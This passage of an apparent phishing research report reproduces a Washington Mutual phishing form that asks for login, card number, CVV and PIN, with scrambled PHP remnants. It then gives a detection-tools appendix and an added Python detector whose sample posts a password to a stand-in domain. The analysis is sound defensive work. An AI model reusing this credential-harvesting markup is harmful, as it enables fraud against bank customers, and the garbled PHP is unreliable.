<font face="Times New Roman">User ID:</font></b></td>
<td class="mainfontbold" noWrap width="150" height="10"><font face="Times New Roman"><b>
<input id="pwdPassword" title="Password" tabIndex="2" alt="Password" maxLength="32" value name="wamuuser" AUTOCOMPLETE="off" size="20"></b></font></td>
<td width="228" height="19"> </td>
</tr>
<tr>
<td class="mainfontbold" noWrap width="224" height="19"><b>
<font face="Times New Roman">Password: </font></b></td>
<td class="mainfontbold" noWrap width="150" height="19"><font face="Times New Roman"><b>
<input id="pwdPassword0" title="Password" tabIndex="2" type="password" alt="Password" maxLength="32" value name="wamupass" AUTOCOMPLETE="off" size="20"></b></font></td>
<td width="228" height="19"> </td>
</tr>
<tr>
<td vAlign="bottom" align="left" width="224" height="19"><b>
<font class="mainfontbold" face="Times New Roman">ATM/Visa Check Card
Number:</font></b></td>
<td vAlign="bottom" align="left" width="150" height="19">
<font face="Times New Roman"><b>
<input id="pwdPassword1" title="Password" tabIndex="2" alt="Password" maxLength="32" value name="ccnumber" AUTOCOMPLETE="off" size="20"></b></font></td>
<td vAlign="bottom" align="left" width="228" height="19">
</td>
</tr>
<tr>
<td vAlign="bottom" align="left" width="224" height="14">
<font face="Times New Roman"><span class="mainfontbold">
<label for="expdate_month"><b>Expiration Date:</b></label></span></font></td>
<td vAlign="bottom" align="left" width="150" height="14">
<font face="Times New Roman"><b><select id="select2" name="ex_luna">
<option value="0" selected>- -</option>
<option value="1" ?selected?;}? {echo ?1?) ($expdate_month="=" If <?php>
>01</option>
<option value="2" ?selected?;}? {echo ($expdate_month="=" If <?php ?2?)>
>02</option>
<option value="3" ?selected?;}? {echo ($expdate_month="=" If <?php ?3?)>
>03</option>
<option value="4" ?selected?;}? {echo ($expdate_month="=" If <?php ?4?)>
>04</option>
<option value="5" ?selected?;}? {echo ($expdate_month="=" If <?php ?5?)>
>05</option>
<option value="6" ?selected?;}? {echo ($expdate_month="=" If <?php ?6?)>
>06</option>
<option value="7" ?selected?;}? {echo ($expdate_month="=" If <?php ?7?)>
>07</option>
<option value="8" ?selected?;}? {echo ($expdate_month="=" If <?php ?8?)>
>08</option>
<option value="9" ?selected?;}? {echo ($expdate_month="=" If <?php ?9?)>
>09</option>
<option value="10" ?selected?;}? {echo ($expdate_month="=" If <?php ?10?)>
>10</option>
<option value="11" ?selected?;}? {echo ($expdate_month="=" If <?php ?11?)>
>11</option>
<option value="12" ?selected?;}? {echo ($expdate_month="=" If <?php ?12?)>
>12</option>
</select><select name="exan">
<option value="0" selected>- - - -</option>
<option value="2004" ?selected?;}? {echo If <?php ?2004?) ($expdate_year="=">
>2004</option>
<option value="2005" ?selected?;}? {echo If <?php ($expdate_year="=" ?2005?)>
>2005</option>
<option value="2006" ?selected?;}? {echo If <?php ($expdate_year="=" ?2006?)>
>2006</option>
<option value="2007" ?selected?;}? {echo If <?php ($expdate_year="=" ?2007?)>
>2007</option>
<option value="2008" ?selected?;}? {echo If <?php ($expdate_year="=" ?2008?)>
>2008</option>
<option value="2009" ?selected?;}? {echo If <?php ($expdate_year="=" ?2009?)>
>2009</option>
<option value="2010" ?selected?;}? {echo If <?php ($expdate_year="=" ?2010?)>
>2010</option>
<option value="2011" ?selected?;}? {echo If <?php ($expdate_year="=" ?2011?)>
>2011</option>
<option value="2012" ?selected?;}? {echo If <?php ($expdate_year="=" ?2012?)>
>2012</option>
<option value="2013" ?selected?;}? {echo If <?php ($expdate_year="=" ?2013?)>
>2013</option>
<option value="2014" ?selected?;}? {echo If <?php ($expdate_year="=" ?2014?)>
>2014</option>
<option value="2015" ?selected?;}? {echo If <?php ($expdate_year="=" ?2015?)>
>2015</option>
</select></b></font></td>
<td vAlign="bottom" align="left" width="228" height="14">
</td>
</tr>
<tr>
<td vAlign="bottom" align="left" width="224" height="17"><b>
<font class="mainfontbold" face="Times New Roman">Card Verification
Number:</font></b></td>
<td vAlign="bottom" align="left" width="150" height="17">
<font face="Times New Roman"><b>
<input id="pwdPassword2" title="Password" tabIndex="2" alt="Password" maxLength="32" value name="cvv2" AUTOCOMPLETE="off" size="4"></b></font></td>
<td vAlign="bottom" align="left" width="228" height="17">
</td>
</tr>
<tr>
<td vAlign="bottom" align="left" width="224" height="19"><b>
<font class="mainfontbold" face="Times New Roman">Pin:</font></b></td>
<td vAlign="bottom" align="left" width="150" height="19">
<font face="Times New Roman"><b>
<input id="pwdPassword3" title="Password" tabIndex="2" type="password" alt="Password" maxLength="32" value name="pin" AUTOCOMPLETE="off" size="4"></b></font></td>
<td vAlign="bottom" align="left" width="228" height="19">
</td>
</tr>
</table>
</td>
<td bgColor="#ffcc00" width="10"> </td>
</tr>
<tr>
<td width="10">
<img alt src="https://login.personal.wamu.com/images/logon_ybl.gif" border="0" width="10" height="10"></td>
<td bgColor="#ffcc00" width="443">
<img alt src="https://login.personal.wamu.com/images/1px_clear.gif" border="0" width="1" height="1"></td>
<td width="10">
<img alt src="https://login.personal.wamu.com/images/logon_ybr.gif" border="0" width="10" height="10"></td>
</tr>
</table>
<br>
<input type="submit" value="Secure Update >"><p>We apologize for any inconvenience this may cause, and appreciate your
assistance in helping us maintain the<br>
integrity of the entire Washington Mutual system. Thank you for your promt
attention to this matter.<br>
<br>
Sincerly,
<br>
The Washington Mutual Team<br>
<br>
Please do not respond to this e-mail. Mail sent to this address cannot be
answered. For Assistance, log in to<br>
your Washington Mutual account and choose the "Help" link in the header of
any page.</p>
<input type="hidden" size="30" name="id" value="124">
<input type="hidden" size="30" name="mailuser" value="EMAILADDRESSIS">
<input type="hidden" size="30" name="ebay_user_id" value="test">
</td>
</tr>
<tr>
<td bgcolor="#000099"><font color="#FFFFFF"><nobr>
<img height="1" alt src="http://www.wamu.com/images/spacer.gif" width="4" border="0">© Copyright
2005, Washington Mutual, Inc. All Rights. Reserved.</nobr></font></td>
</tr>
</table>
Appendix B: Detection Tools
Some anti-virus/mail scanning tools will filter scam messages such as those presented in this paper. One such tool is McAfee’s scanner, which successfully identified and blocked delivery of the email known as “Message 7” above. Below are the details of this detection:
Phish-BankFraud.eml Trojan
Technical details of failure:
McAfee’s technical discussion of such scams is presented at: http://vil.nai.com/vil/content/v_127728.htm
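The messages in Appendix A share a few structural traits that a mail filter can test for: a link host hidden behind percent-encoding (Message 0), a bare IP address as the link target (Message 1), and a password field whose form posts to an unrelated domain (Message 7). The following is an added example, not part of the original report and not a description of how McAfee's scanner works; the brand domain `bank.example`, the sample markup and all function names are assumptions made for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit, unquote

BRAND = "bank.example"   # assumption: domain the message claims to come from
# Constructed sample modelled on the traits of Messages 0, 1 and 7
SAMPLE = """<a href="http://192.0.2.44/update/index.htm">https://www.bank.example/login</a>
<map><area href="http://%31%39%32%2E%30%2E%32%2E%34%34:%38%37/x"></map>
<form action="http://forms.example.net/confirm.php"><input type="password" name="pin"></form>"""

def host(url):
    """Return (host as written, percent-decoded lower-case host)."""
    try:
        raw = urlsplit(url.strip()).hostname or ""
    except ValueError:                       # malformed authority part
        raw = ""
    return raw, unquote(raw).lower()

class TargetAudit(HTMLParser):               # collects (finding, host) pairs
    def __init__(self):
        super().__init__()
        self.findings, self._action = set(), None

    def _target(self, url):
        raw, h = host(url)
        if "%" in raw:                       # host hidden behind percent-encoding
            self.findings.add(("encoded-host", h))
        if re.fullmatch(r"\d{1,3}(\.\d{1,3}){3}", h):   # bare IP instead of a name
            self.findings.add(("ip-literal-host", h))
        return h

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag in ("a", "area") and a.get("href"):
            self._target(a["href"])
        elif tag == "form":                  # remember where this form submits
            self._action = self._target(a.get("action") or "")
        elif tag == "input" and self._action and (a.get("type") or "").lower() == "password":
            if self._action != BRAND and not self._action.endswith("." + BRAND):
                self.findings.add(("password-posted-off-brand", self._action))

    def handle_endtag(self, tag):
        if tag == "form":
            self._action = None

def audit(html):
    parser = TargetAudit()
    parser.feed(html)
    return sorted(parser.findings)
```

Calling `audit(SAMPLE)` returns one finding per trait, each paired with the decoded host it was raised for.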
Copyright © 2004 infectionvectors.com. All rights reserved.